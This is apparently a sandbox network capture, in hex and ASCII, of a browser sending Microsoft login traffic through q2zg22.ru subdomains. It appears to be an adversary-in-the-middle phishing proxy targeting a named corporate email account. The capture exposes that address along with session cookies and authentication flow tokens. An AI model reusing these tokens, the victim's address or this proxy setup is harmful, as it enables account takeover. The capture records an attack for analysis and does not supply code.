buid=0.AVoAMe_N-B6jSkuT5F9XHpElWltEZUfGMrBJg-Ydk3ZSdsoBAAA.AQABAAEAAAAmoFfGtYxvRrNriQdPKIZ-hE7W-3HlJa9owQFnQJrRENYP0J9Z8A-K4WnZMGz7A5QqO0kXsumO3i8krFA5k1OOPVOxoHJmIILqI1PwJRpWBA8-0mMatTVn8txshoM21rkgAA; esctx=PAQABAAEAAAAmoFfGtYxvRrNriQdPKIZ-6sTAqDqt7ElFdN1sJSaDq_ggXMYVMb3uFYjIUVq62UeBPW3IB1LLdQHLQLLWtDHFMCnGz_YASr9t1IZ44yG-lHE2RWEbLOxEiDD7CCS16c7IvvS0q5msftUfTo962NYUj6qggkeRtHO1iFZB-mBEoCFjaDe7d9mg2e5R4XwYOGIgAA; esctx-yQ0qBjjSemE=AQABAAEAAAAmoFfGtYxvRrNriQdPKIZ-iwnOVAzk-mItPYr1eQ-sYWbmhyqBBdm4z6h7jGV3ZTXukH7TxUtzWNjtL_t73Uz9IBQF2UFqfSEiaPZFY9iL4PQjdyE08trjoIqH9KdicIyP1dGJxUIK_srG1mb_8kyCjl8feyTl_S4jJh_EKFvwBSAA; fpc=Aq_odsI7GDJHm8suSWCV-X-8Ae7AAgAAAN82T90OAAAA
                                                                                                                          2024-02-02 19:18:28 UTC2082OUTData Raw: 7b 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 61 6c 65 73 40 64 75 64 69 63 6b 2e 63 6f 6d 22 2c 22 69 73 4f 74 68 65 72 49 64 70 53 75 70 70 6f 72 74 65 64 22 3a 74 72 75 65 2c 22 63 68 65 63 6b 50 68 6f 6e 65 73 22 3a 66 61 6c 73 65 2c 22 69 73 52 65 6d 6f 74 65 4e 47 43 53 75 70 70 6f 72 74 65 64 22 3a 74 72 75 65 2c 22 69 73 43 6f 6f 6b 69 65 42 61 6e 6e 65 72 53 68 6f 77 6e 22 3a 66 61 6c 73 65 2c 22 69 73 46 69 64 6f 53 75 70 70 6f 72 74 65 64 22 3a 74 72 75 65 2c 22 6f 72 69 67 69 6e 61 6c 52 65 71 75 65 73 74 22 3a 22 72 51 51 49 41 52 41 41 68 5a 4b 5f 69 39 74 32 47 4d 59 74 2d 38 36 35 4d 30 31 7a 70 43 48 30 74 71 4d 55 45 70 72 4b 5f 75 71 6e 72 59 4d 4d 31 6b 6b 6e 79 35 59 73 79 79 66 64 6e 64 54 42 32 4a 59 73 53 5f 70 4b 38 67 5f 5a 73 6a 53
                                                                                                                          Data Ascii: {"username":"sales@dudick.com","isOtherIdpSupported":true,"checkPhones":false,"isRemoteNGCSupported":true,"isCookieBannerShown":false,"isFidoSupported":true,"originalRequest":"rQQIARAAhZK_i9t2GMYt-865M01zpCH0tqMUEprK_uqnrYMM1kkny5YsyyfdndTB2JYsS_pK8g_ZsjS
                                                                                                                          2024-02-02 19:18:28 UTC1087INHTTP/1.1 200 OK
                                                                                                                          Date: Fri, 02 Feb 2024 19:18:28 GMT
                                                                                                                          Content-Type: application/json; charset=utf-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
                                                                                                                          Access-Control-Allow-Credentials: true
                                                                                                                          Cache-Control: no-cache, no-store
                                                                                                                          Client-Request-Id: a2d3a705-3719-4180-a89a-d819ae49ee07
                                                                                                                          Expires: -1
                                                                                                                          Nel: {"report_to":"network-errors","max_age":86400,"success_fraction":0.001,"failure_fraction":1.0}
                                                                                                                          P3p: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                                                                                          Pragma: no-cache
                                                                                                                          Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                          Report-To: {"group":"network-errors","max_age":86400,"endpoints":[{"url":"https://identity.nel.measure.office.net/api/report?catId=GW+estsfd+chi"}]}
                                                                                                                          Set-Cookie: fpc=Aq_odsI7GDJHm8suSWCV-X-8Ae7AAgAAAN82T90OAAAA; Path=/; Expires=Sun, 03 Mar 2024 19:18:28 GMT; HttpOnly; Secure; SameSite=None
                                                                                                                          Set-Cookie: x-ms-gateway-slice=estsfd; Path=/; HttpOnly; Secure; SameSite=None
                                                                                                                          X-Ms-Ests-Server: 2.1.17184.4 - NCUS ProdSlices
                                                                                                                          X-Ms-Request-Id: 27f6d83b-acfc-46a9-90bf-9d1e002f1d00
                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 84f4c7bb8e4353c2-ATL
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          2024-02-02 19:18:28 UTC282INData Raw: 35 36 34 0d 0a 7b 22 55 73 65 72 6e 61 6d 65 22 3a 22 73 61 6c 65 73 40 64 75 64 69 63 6b 2e 63 6f 6d 22 2c 22 44 69 73 70 6c 61 79 22 3a 22 73 61 6c 65 73 40 64 75 64 69 63 6b 2e 63 6f 6d 22 2c 22 49 66 45 78 69 73 74 73 52 65 73 75 6c 74 22 3a 35 2c 22 49 73 55 6e 6d 61 6e 61 67 65 64 22 3a 66 61 6c 73 65 2c 22 54 68 72 6f 74 74 6c 65 53 74 61 74 75 73 22 3a 30 2c 22 43 72 65 64 65 6e 74 69 61 6c 73 22 3a 7b 22 50 72 65 66 43 72 65 64 65 6e 74 69 61 6c 22 3a 31 2c 22 48 61 73 50 61 73 73 77 6f 72 64 22 3a 74 72 75 65 2c 22 52 65 6d 6f 74 65 4e 67 63 50 61 72 61 6d 73 22 3a 6e 75 6c 6c 2c 22 46 69 64 6f 50 61 72 61 6d 73 22 3a 6e 75 6c 6c 2c 22 51 72 43 6f 64 65 50 69 6e 50 61 72 61 6d 73 22 3a 6e 75 6c 6c 2c 22 53 61 73 50 61 72 61 6d 73 22 3a 6e 75 6c
                                                                                                                          Data Ascii: 564{"Username":"sales@dudick.com","Display":"sales@dudick.com","IfExistsResult":5,"IsUnmanaged":false,"ThrottleStatus":0,"Credentials":{"PrefCredential":1,"HasPassword":true,"RemoteNgcParams":null,"FidoParams":null,"QrCodePinParams":null,"SasParams":nul
                                                                                                                          2024-02-02 19:18:28 UTC1105INData Raw: 6f 67 6c 65 50 61 72 61 6d 73 22 3a 6e 75 6c 6c 2c 22 46 61 63 65 62 6f 6f 6b 50 61 72 61 6d 73 22 3a 6e 75 6c 6c 2c 22 4f 74 63 4e 6f 74 41 75 74 6f 53 65 6e 74 22 3a 66 61 6c 73 65 7d 2c 22 45 73 74 73 50 72 6f 70 65 72 74 69 65 73 22 3a 7b 22 55 73 65 72 54 65 6e 61 6e 74 42 72 61 6e 64 69 6e 67 22 3a 6e 75 6c 6c 2c 22 44 6f 6d 61 69 6e 54 79 70 65 22 3a 33 7d 2c 22 46 6c 6f 77 54 6f 6b 65 6e 22 3a 22 41 51 41 42 41 41 45 41 41 41 41 6d 6f 46 66 47 74 59 78 76 52 72 4e 72 69 51 64 50 4b 49 5a 2d 4c 4a 53 6f 37 47 33 35 70 39 37 67 34 79 50 45 45 49 6b 53 4c 7a 79 6c 57 70 4a 31 39 48 38 30 45 6b 71 73 64 2d 52 75 38 4d 67 38 6b 30 78 54 79 53 75 39 6e 46 6c 72 53 38 31 44 41 70 69 48 72 54 72 54 79 50 78 44 55 7a 64 68 4f 4a 74 48 6d 45 4a 30 4f 43 49
                                                                                                                          Data Ascii: ogleParams":null,"FacebookParams":null,"OtcNotAutoSent":false},"EstsProperties":{"UserTenantBranding":null,"DomainType":3},"FlowToken":"AQABAAEAAAAmoFfGtYxvRrNriQdPKIZ-LJSo7G35p97g4yPEEIkSLzylWpJ19H80Ekqsd-Ru8Mg8k0xTySu9nFlrS81DApiHrTrTyPxDUzdhOJtHmEJ0OCI
                                                                                                                          2024-02-02 19:18:28 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          91192.168.2.1649830172.67.209.714435716C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-02-02 19:18:29 UTC2739OUTGET /common/GetCredentialType?mkt=en-US HTTP/1.1
                                                                                                                          Host: office.q2zg22.ru
                                                                                                                          Connection: keep-alive
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                          Accept: */*
                                                                                                                          Sec-Fetch-Site: none
                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          Cookie: ae23-8632=afc35fefb916ef4eaaf2fe859837e744a9c25a67b61248f6ee93c6a02ca7fe04; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; MUID=2E6F22D2EA936CD30EE836CBEBB26D97; esctx-sAcwFNXs9p0=AQABAAEAAAAmoFfGtYxvRrNriQdPKIZ-Xz-zY4mFOFPtOKDCtkncDgiCqiq8JSPFEneyjDU4hFCxc9yKOXR0OSKd5FYQRJM3mXeQZYPo-cw18QcWUama1nI0_hypcV18IPjbFcAN8l-2_npQ8hQ5HCn_XXMqMr00sdRCGYoSBfgWdZ8ETjE1OiAA; AADSSO=NA|NoExtension; SSOCOOKIEPULLED=1; esctx-M3Evdg9W3gI=AQABAAEAAAAmoFfGtYxvRrNriQdPKIZ-JqQWhBFF3iERp8Semywl5LKbWyjZoUSF17HR6LRJwEeJzRn7zd5hZTtbNOswRWLDQ8kQv3hJMqkVu2XeDuIthdsdh_qgD7pZ2CcAHHgScJuPoGyxYFiTiJuI8--bsFrVKPZQGoqN7dxUP9axzl0FDSAA; brcap=0; cf_clearance=DGVCDqJo4p8HXwiT2d9w7JleZ4qt8BY6c2qPP4YgtPs-1706901470-1-Acw5T7KtW0gzkNpwcfV200Vk3xmGo+jR5De1FJxtB8nNFB0tvSoBxYcHLUPxaQHxfbpp+xPD48APvvJqR81dSEE=; esctx-FfwgWlnTCko=AQABAAEAAAAmoFfGtYxvRrNriQdPKIZ-QQIYc2f6sjkAdFmj32fTdGjbHy6r5zpymHnrIl-qxGm2M5qe1vQy_uNxlAL8GMxQt9EBNI1EGcDNXOVrYqaOeg0WPIUqbnM2q1S6Q4WKMcWuDPb8NgfMp8EkVKDmr-M65eUsJ9kczDD1hrAZJYCZeCAA; ESTSWCTXFLOWTOKEN=AQABAAEAAAAmoFfGtYxvRrNriQdPKIZ-6_pnhGoDhBgou9FA7aOdCkLjUWWNQnZ5kCDMiWbLxdEGhoHWW1LuK-vIr9PbdkktA9xaLrfVOAXEyss_lHk-Yb3Ft_HREp3zElGWHQaJ4VRu3di2hrvSd8OoGa-oejpBA0oMNQbpFrjl5rPQS1QnaAT-siwFQn3Wdo64-6EW-O4sOSDLtEprmVUPuo5AW5sq_kp59o4vIyfEe5ehf6XYbAt_VHs51bFjL0gTRp8A4lJk9Wuz7zyo0Q8zoOwGeOj4k-RqAIIo3GKJWZlozbOolHwKKo08zGtX7FU-QyTx8nssBxHM6A3tUft4BJ18KKCDidsmKLYzIPNBz0llbaLmEqx-uFE2tK-qdMPUt7Go3bShLWmR2qvomuzhkFaYpEqcCYXbVo_4gbO4-SH0YIi9G6rQvMfG_jbR9WVjKEzrzaAy58yzN6fFPRTBBb354gGQdqHLjDFtrC6cCZ5XHQM56r7SZ5UF0tWeVMRUkteA7QtYwIoAUF9RUXf9jfAtV8vEFm4p4Z9eDu_eILSIiwMRmUbyMKzZ-aSVPgZrSf-xVGNY6cDRkk-jv-YhXbGoaAx0qSAfVSsW3c6yxlPXtE9t5wWIcjSR0pzXKiCJsLmHiws0FRnRPSUfQgTdcjueLdj6IAA; buid=0.AVoAMe_N-B6jSkuT5F9XHpElWltEZUfGMrBJg-Ydk3ZSdsoBAAA.AQABAAEAAAAmoFfGtYxvRrNriQdPKIZ-hE7W-3HlJa9owQFnQJrRENYP0J9Z8A-K4WnZMGz7A5QqO0kXsumO3i8krFA5k1OOPVOxoHJmIILqI1PwJRpWBA8-0mMatTVn8txshoM21rkgAA; esctx=PAQABAAEAAAAmoFfGtYxvRrNriQdPKIZ-6sTAqDqt7ElFdN1sJSaDq_ggXMYVMb3uFYjIUVq62UeBPW3IB1LLdQHLQLLWtDHFMCnGz_YASr9t1IZ44yG-lHE2RWEbLOxEiDD7CCS16c7IvvS0q5msftUfTo962NYUj6qggkeRtHO1iFZB-mBEoCFjaDe7d9mg2e5R4XwYOGIgAA; esctx-yQ0qBjjSemE=AQABAAEAAAAmoFfGtYxvRrNriQdPKIZ-iwnOVAzk-mItPYr1eQ-sYWbmhyqBBdm4z6h7jGV3ZTXukH7TxUtzWNjtL_t73Uz9IBQF2UFqfSEiaPZFY9iL4PQjdyE08trjoIqH9KdicIyP1dGJxUIK_srG1mb_8kyCjl8feyTl_S4jJh_EKFvwBSAA; fpc=Aq_odsI7GDJHm8suSWCV-X-8Ae7AAgAAAN82T90OAAAA
                                                                                                                          2024-02-02 19:18:29 UTC1029INHTTP/1.1 200 OK
                                                                                                                          Date: Fri, 02 Feb 2024 19:18:29 GMT
                                                                                                                          Content-Type: application/json; charset=utf-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
                                                                                                                          Access-Control-Allow-Credentials: true
                                                                                                                          Cache-Control: no-cache, no-store
                                                                                                                          Expires: -1
                                                                                                                          Nel: {"report_to":"network-errors","max_age":86400,"success_fraction":0.001,"failure_fraction":1.0}
                                                                                                                          P3p: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                                                                                          Pragma: no-cache
                                                                                                                          Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                          Report-To: {"group":"network-errors","max_age":86400,"endpoints":[{"url":"https://identity.nel.measure.office.net/api/report?catId=GW+estsfd+chi"}]}
                                                                                                                          Set-Cookie: fpc=Aq_odsI7GDJHm8suSWCV-X-8Ae7AAgAAAN82T90OAAAA; Path=/; Expires=Sun, 03 Mar 2024 19:18:29 GMT; HttpOnly; Secure; SameSite=None
                                                                                                                          Set-Cookie: x-ms-gateway-slice=estsfd; Path=/; HttpOnly; Secure; SameSite=None
                                                                                                                          X-Ms-Ests-Server: 2.1.17216.2 - EUS ProdSlices
                                                                                                                          X-Ms-Request-Id: 27d1ec6b-fca3-4a42-8230-27a4b65cca00
                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 84f4c7c08c78b11e-ATL
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          2024-02-02 19:18:29 UTC170INData Raw: 61 34 0d 0a 7b 22 65 72 72 6f 72 22 3a 7b 22 63 6f 64 65 22 3a 36 31 30 30 2c 22 73 74 73 45 72 72 6f 72 22 3a 22 41 41 44 53 54 53 39 30 30 35 36 31 22 2c 22 63 6f 72 72 65 6c 61 74 69 6f 6e 49 64 22 3a 22 38 37 31 39 31 65 61 38 2d 65 33 66 33 2d 34 62 32 65 2d 61 39 32 63 2d 31 63 37 62 62 30 64 64 32 38 66 66 22 2c 22 74 69 6d 65 73 74 61 6d 70 22 3a 22 32 30 32 34 2d 30 32 2d 30 32 20 31 39 3a 31 38 3a 32 39 5a 22 2c 22 6d 65 73 73 61 67 65 22 3a 22 41 41 44 53 54 53 39 30 30 35 36 31 22 7d 7d 0d 0a
                                                                                                                          Data Ascii: a4{"error":{"code":6100,"stsError":"AADSTS900561","correlationId":"87191ea8-e3f3-4b2e-a92c-1c7bb0dd28ff","timestamp":"2024-02-02 19:18:29Z","message":"AADSTS900561"}}
                                                                                                                          2024-02-02 19:18:29 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          92192.168.2.1649831104.21.85.1894435716C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-02-02 19:18:29 UTC3593OUTGET /oauth20_authorize.srf?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&scope=openid+profile+https%3a%2f%2freact.q2zg22.ru%2fv2%2fOfficeHome.All&redirect_uri=https%3a%2f%2freact.q2zg22.ru%2flandingv2&response_type=code+id_token&state=cVigJ0JKTf9_p9nwrLeIejpLLL12Uyh9OPJOdewXQlGmDl6PEuqBRU12YO_Rh7PQdKwvV6i1wFIUZ9-EhwYWtkG4yTfICV5C6jSNAUoADJ6_0zI8wNMdIdaSYa8hT-NSBLEbMy_G0BYDULKKBl4E9Ea810-L67NsvlH1vUDs5gM8GHezu9jGTZv5CnUNeALJbhR-E1LnrgBBLTmgIMnzcGRIYgbDyHMzjadqPT5yQgH1vbHDx95jzBZOmijLYriIMyXBuWk5BqZIt3QU0LE--A&response_mode=form_post&nonce=638424983050563650.Y2ExYzgxZjItYzQ0OC00NGZiLTlkZmEtMTgyODk2MjEzNTZlM2IyMDBhY2MtZjlmZC00NjY1LTg2MTQtMzBiOTZjZmQzZmZk&x-client-SKU=ID_NET6_0&x-client-Ver=6.34.0.0&uaid=a2d3a70537194180a89ad819ae49ee07&msproxy=1&issuer=mso&tenant=common&ui_locales=en-US&epct=PAQABAAEAAAAmoFfGtYxvRrNriQdPKIZ-wPnKDyEAN_-6_8G41fz1PZOuL_1y9VtFP9t7p5gKipKKkELpLDxD2Rb7BLgS6h8Soay21wXTavcrc02E4yhCuHro0M9AvwBh2rBqhWv2_UozUSmdABAVrgZtx9AirQKvOQbYZGv_tKnDBJnro-7F_HgAANox4NGPRLIGMSuESBuxG8f2BFJIZEtbl3BqgvaQaY4NjmYaKcMNXs_n1rWbgyAA&jshs=0&username=sales%40dudick.com&login_hint=sales%40dudick.com HTTP/1.1
                                                                                                                          Host: ywnjb.q2zg22.ru
                                                                                                                          Connection: keep-alive
                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                          Upgrade-Insecure-Requests: 1
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                          Sec-Fetch-Site: same-site
                                                                                                                          Sec-Fetch-Mode: navigate
                                                                                                                          Sec-Fetch-Dest: document
                                                                                                                          Referer: https://office.q2zg22.ru/
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          Cookie: ae23-8632=afc35fefb916ef4eaaf2fe859837e744a9c25a67b61248f6ee93c6a02ca7fe04; MUID=2E6F22D2EA936CD30EE836CBEBB26D97; cf_clearance=DGVCDqJo4p8HXwiT2d9w7JleZ4qt8BY6c2qPP4YgtPs-1706901470-1-Acw5T7KtW0gzkNpwcfV200Vk3xmGo+jR5De1FJxtB8nNFB0tvSoBxYcHLUPxaQHxfbpp+xPD48APvvJqR81dSEE=; MSCC=143.110.219.151-CA; MSPOK=$uuid-feea05ca-1408-49c9-a001-ad97673e736c; OParams=11O.Dqw7oMsnFRnIYqspcJbLIxKcamHyh9DSRrFQOg*Nk4BEID!tb86nwfFa41HP2PuAWs7t532JlwT6iqJhWGq3yuFIbenSo0UYE498Wf!KHCgLFDdDlQwdw2otFPT37WRzMLYo1ruiulbbhYr2kSBHpqXF1CIhhQJJaP*qA6IT80ZVTMByHul7ZkgnaNslrXLPMP0OM9mm6eQ*Zvk083BpRBi8JiucY81cU*1fHZ4pmzX!hKwqprOajzkT!GvWa4x5Ku7fIS*uaF8iAMfDDOKpmUgNscGdv9tSvkVXPmKRAfv08tIGcxzGG9!ahvrMKIAMwrmsUUc8dRUeyXwg6CtZxLWJW340n4b5!LZGRO1zT6VmRwB*nDwDYJLCwad06trcy5SNpBBLG59ODeo9MX5WDUfphgKUGMP50BJDdBVZ**GrCW871F4RKw412LyURsbTkk4oLv7kLw2XQbUkcPCiRtp8xiqxeYj2gqBd8XDQi5u0lrHh9Hqiotr4Iom7*GEiwPKusojvkDSUprLsgnm6E52UJ53S9q2PTgu7LH8tGaYIMXmFLWweEbHPqRJtB*N8kGkHcldoFXqx8mxCqq9mX2OKrCNhlE8oFgcHuS3hrRe3dao22d2lhKvpeAT8Ztj54Wml7e3tVbCL!kDmwyjh4ZoFBfAoa5nq4XnhZOTn2Yk3O2mLypSQQ80Jk*8TUk!9mcF5N6952ZYZZMkbIWNQ*VuOsb4mRwzJHd3wQGe8fCRxxwwQBIQtWBVcYTiYwcf4xVogI2eL!eCB*guT2JeJw2LRko5PdH3cL6FNZH3o9E!sLmZ4decOkrMJqb8I2ObA2yuWXIAfgeZxTqMmSfq2kSHJYBwJ2j!SRwSr4Ehgvl*Bev7I*ATli20PRk0RjblHLcmktfUWdSqNnhmJoxeE7yK3X847MpAPDrhdN86deMO3UBa5fmkhZS3qLKPMbybRkXQIvC!Va*6GVfGrBSQ93o*2PBUw8jmtevb8rpJiyYEc7xzk2tKqQkA5et6feN9QEWIe3cWw6o4PT7GcptF2igE7SY590WIaLoA8uG0ARkB4kNJzB2NPOmI1zuGdX7ohRBcncoEkSESvJ5HpbJjoOGS2zR2A7YX0oS5QJHI0IUgQNn1FB8SgbZDMALKS!sTrMV33GgBe7d8dwLCEnNXMZS2!3Sk8jnKDp1NiIBhpMlDp1x01x2jymLrcjeEXA4BgjQ$$; MicrosoftApplicationsTelemetryDeviceId=72c0f85c-d0f5-4e37-bf7f-5d43c41b787c; ai_session=pzuSdwV0qlEhCs1mb9CtVq|1706901479212|1706901479212; uaid=e42e0277610a4fbd9b38c0bae611b9f4; MSPRequ=id=N&lt=1706901507&co=1
                                                                                                                          2024-02-02 19:18:29 UTC1336INHTTP/1.1 200 OK
                                                                                                                          Date: Fri, 02 Feb 2024 19:18:29 GMT
                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
                                                                                                                          Access-Control-Allow-Credentials: true
                                                                                                                          Cache-Control: no-cache, no-store
                                                                                                                          Expires: Fri, 02 Feb 2024 19:17:29 GMT
                                                                                                                          Fdrtelemetry: &481=1001&59=5&213=8444250379294618&215=-2147217396&315=1&256=-2147217399&481=1001&215=-2147217396&315=1&214=15216&288=16.0.30091.10
                                                                                                                          Link: <https://logincdn.msftauth.net>; rel=preconnect; crossorigin
                                                                                                                          Link: <https://acctcdn.msauth.net>; rel=preconnect; crossorigin
                                                                                                                          Link: <https://acctcdn.msftauth.net>; rel=preconnect; crossorigin
                                                                                                                          Link: <https://acctcdn.msauth.net/>; rel=dns-prefetch
                                                                                                                          Link: <https://acctcdn.msftauth.net/>; rel=dns-prefetch
                                                                                                                          Link: <https://acctcdnmsftuswe2.azureedge.net/>; rel=dns-prefetch
                                                                                                                          Link: <https://acctcdnvzeuno.azureedge.net/>; rel=dns-prefetch
                                                                                                                          Link: <https://logincdn.msauth.net/>; rel=dns-prefetch
                                                                                                                          Link: <https://logincdn.msftauth.net/>; rel=dns-prefetch
                                                                                                                          Link: <https://lgincdnvzeuno.azureedge.net/>; rel=dns-prefetch
                                                                                                                          Link: <https://lgincdnmsftuswe2.azureedge.net/>; rel=dns-prefetch
                                                                                                                          P3p: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                                                                                          Ppserver: PPV: 30 H: SN1PEPF0002CF50 V: 0
                                                                                                                          Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                          Set-Cookie: MSPRequ=id=N&lt=1706901509&co=2; Path=/; Domain=ywnjb.q2zg22.ru; HttpOnly; Secure; SameSite=None
                                                                                                                          2024-02-02 19:18:29 UTC285INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 75 61 69 64 3d 61 32 64 33 61 37 30 35 33 37 31 39 34 31 38 30 61 38 39 61 64 38 31 39 61 65 34 39 65 65 30 37 3b 20 50 61 74 68 3d 2f 3b 20 44 6f 6d 61 69 6e 3d 79 77 6e 6a 62 2e 71 32 7a 67 32 32 2e 72 75 3b 20 48 74 74 70 4f 6e 6c 79 3b 20 53 65 63 75 72 65 3b 20 53 61 6d 65 53 69 74 65 3d 4e 6f 6e 65 0d 0a 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 4d 53 50 4f 4b 3d 24 75 75 69 64 2d 66 65 65 61 30 35 63 61 2d 31 34 30 38 2d 34 39 63 39 2d 61 30 30 31 2d 61 64 39 37 36 37 33 65 37 33 36 63 24 75 75 69 64 2d 31 65 33 63 34 61 35 61 2d 37 63 34 37 2d 34 61 35 65 2d 62 30 66 38 2d 62 36 64 32 32 63 61 35 30 65 33 38 3b 20 50 61 74 68 3d 2f 3b 20 44 6f 6d 61 69 6e 3d 79 77 6e 6a 62 2e 71 32 7a 67 32 32 2e 72 75 3b 20 48 74 74
                                                                                                                          Data Ascii: Set-Cookie: uaid=a2d3a70537194180a89ad819ae49ee07; Path=/; Domain=ywnjb.q2zg22.ru; HttpOnly; Secure; SameSite=NoneSet-Cookie: MSPOK=$uuid-feea05ca-1408-49c9-a001-ad97673e736c$uuid-1e3c4a5a-7c47-4a5e-b0f8-b6d22ca50e38; Path=/; Domain=ywnjb.q2zg22.ru; Htt
                                                                                                                          2024-02-02 19:18:29 UTC2428INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 4f 50 61 72 61 6d 73 3d 31 31 4f 2e 44 76 31 4b 52 63 6e 48 66 21 78 48 36 55 77 52 55 78 6e 38 4d 31 65 35 68 37 37 42 64 62 59 6e 36 68 64 4b 30 67 77 6e 37 4c 43 64 74 21 68 61 69 56 37 64 36 34 48 52 34 6a 6e 7a 6b 4b 6f 7a 5a 56 54 30 7a 32 44 73 52 37 69 51 37 69 43 63 38 64 53 31 69 21 4c 79 33 51 74 68 36 75 63 41 63 4b 4e 61 4d 38 55 6f 69 6d 4c 32 7a 61 35 2a 6f 50 63 52 7a 58 6e 67 6d 77 63 64 65 75 7a 4c 57 4e 41 77 35 79 76 51 62 47 21 73 74 32 73 46 55 33 50 76 53 5a 37 33 46 7a 61 4d 4d 2a 4f 47 4e 56 57 70 51 39 45 37 32 50 44 4b 46 62 30 63 6f 76 4f 59 61 41 7a 45 68 44 45 58 65 6a 59 4b 59 46 6a 6c 37 65 66 68 58 5a 76 43 64 36 58 46 5a 70 51 54 74 55 4b 39 37 6f 6a 70 48 4a 57 6b 6d 45 45 66 79 71 7a
                                                                                                                          Data Ascii: Set-Cookie: OParams=11O.Dv1KRcnHf!xH6UwRUxn8M1e5h77BdbYn6hdK0gwn7LCdt!haiV7d64HR4jnzkKozZVT0z2DsR7iQ7iCc8dS1i!Ly3Qth6ucAcKNaM8UoimL2za5*oPcRzXngmwcdeuzLWNAw5yvQbG!st2sFU3PvSZ73FzaMM*OGNVWpQ9E72PDKFb0covOYaAzEhDEXejYKYFjl7efhXZvCd6XFZpQTtUK97ojpHJWkmEEfyqz
                                                                                                                          2024-02-02 19:18:29 UTC149INData Raw: 4e 45 4c 3a 20 7b 22 73 75 63 63 65 73 73 5f 66 72 61 63 74 69 6f 6e 22 3a 30 2c 22 72 65 70 6f 72 74 5f 74 6f 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a 36 30 34 38 30 30 7d 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 34 66 34 63 37 63 30 65 38 32 61 36 39 66 38 2d 41 54 4c 0d 0a 61 6c 74 2d 73 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 38 36 34 30 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 84f4c7c0e82a69f8-ATLalt-svc: h3=":443"; ma=86400
                                                                                                                          2024-02-02 19:18:29 UTC1369INData Raw: 34 30 30 30 0d 0a 3c 21 2d 2d 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 2e 20 41 6c 6c 20 72 69 67 68 74 73 20 72 65 73 65 72 76 65 64 2e 20 2d 2d 3e 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 21 2d 2d 20 53 65 72 76 65 72 49 6e 66 6f 3a 20 53 4e 31 50 45 50 46 30 30 30 32 43 46 35 30 20 32 30 32 34 2e 30 31 2e 32 35 2e 31 36 2e 32 36 2e 33 35 20 4c 6f 63 56 65 72 3a 30 20 2d 2d 3e 3c 21 2d 2d 20 50 72 65 70 72 6f 63 65 73 73 49 6e 66 6f 3a 20 43 42 41 2d 30 31 32 35 5f 31 36 31 33 33 37 3a 53 41 32 50 4e 50 46 30 30 30 30 32 31 43 30 2c 20 32 30 32 34 2d 30 31 2d 32 35 54 31 36 3a 32 33 3a 33 30 2e 39 38 30 39 34 30 31 2d 30 38 3a 30 30 20 2d 20 56 65 72 73 69 6f 6e 3a 20 31 36 2c 30
                                                                                                                          Data Ascii: 4000... Copyright (C) Microsoft Corporation. All rights reserved. --><!DOCTYPE html>... ServerInfo: SN1PEPF0002CF50 2024.01.25.16.26.35 LocVer:0 -->... PreprocessInfo: CBA-0125_161337:SA2PNPF000021C0, 2024-01-25T16:23:30.9809401-08:00 - Version: 16,0
